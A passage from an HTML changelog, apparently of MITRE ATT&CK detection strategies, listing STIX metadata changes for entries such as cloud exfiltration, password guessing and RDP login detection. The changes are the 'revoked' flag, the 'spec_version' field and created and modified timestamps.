Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.691000+00:00</td></tr></tbody></table></details><hr><h4>[DET0484] Multi-Platform Cloud Storage Exfiltration Behavior Chain</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.669000+00:00</td></tr></tbody></table></details><hr><h4>[DET0372] Multi-Platform Detection Strategy for T1678 - Delay Execution</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0562] Multi-Platform Execution Guardrails Environmental Validation Detection Strategy</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0299] Multi-Platform File and Directory Permissions Modification Detection Strategy</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0559] Multi-Platform Shutdown or Reboot Detection via Execution and Host Status Events</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.673000+00:00</td></tr></tbody></table></details><hr><h4>[DET0392] Multi-Platform Software Discovery Behavior Chain</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0327] Multi-event Detection Strategy for RDP-Based Remote Logins and Post-Access Activity</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.681000+00:00</td></tr></tbody></table></details><hr><h4>[DET0359] Multi-hop Proxy Behavior via Relay Node Chaining, Onion Routing, and Network Tunneling</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.675000+00:00</td></tr></tbody></table></details><hr><h4>[DET0023] Obfuscated Binary Unpacking Detection via Behavioral Patterns</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.682000+00:00</td></tr></tbody></table></details><hr><h4>[DET0551] Password Guessing via Multi-Source Authentication Failure Correlation</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.689000+00:00</td></tr></tbody></table></details><hr><h4>[DET0161] Password Policy Discovery – cross-platform behavior-chain analytics</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.681000+00:00</td></tr></tbody></table></details><hr><h4>[DET0491] Peripheral Device Enumeration via System Utilities and API Calls</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0302] Port-knock → rule/daemon change → first successful connect (T1205.001)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.680000+00:00</td></tr></tbody></table></details><hr><h4>[DET0105] Post-Credential Dump Password Cracking Detection via Suspicious File Access and Hash Analysis Tools</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0358] Programmatic and Excessive Access to Confluence Documentation</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.675000+00:00</td></tr></tbody></table></details><hr><h4>[DET0370] Recursive Enumeration of Files and Directories Across Privilege Contexts</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table 